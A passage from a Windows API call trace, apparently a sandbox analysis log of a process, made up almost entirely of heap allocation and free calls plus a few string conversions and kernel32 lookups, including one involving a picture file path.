lpWideCharStr=0x9a5d10, cchWideChar=48 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg") returned 48 [0191.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0191.685] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5de0 [0191.685] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.686] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.686] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0191.687] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0191.687] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.687] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.688] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.689] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.689] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0191.689] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0191.689] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0191.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0191.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0191.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.690] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.690] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0191.690] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.691] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.691] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.691] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.691] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0191.692] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0191.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.692] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0191.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.692] CloseHandle (hObject=0x158) returned 1 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.692] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.692] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.693] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.693] FreeLibrary (hLibModule=0x75990000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.693] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.694] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0191.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.694] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0191.694] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 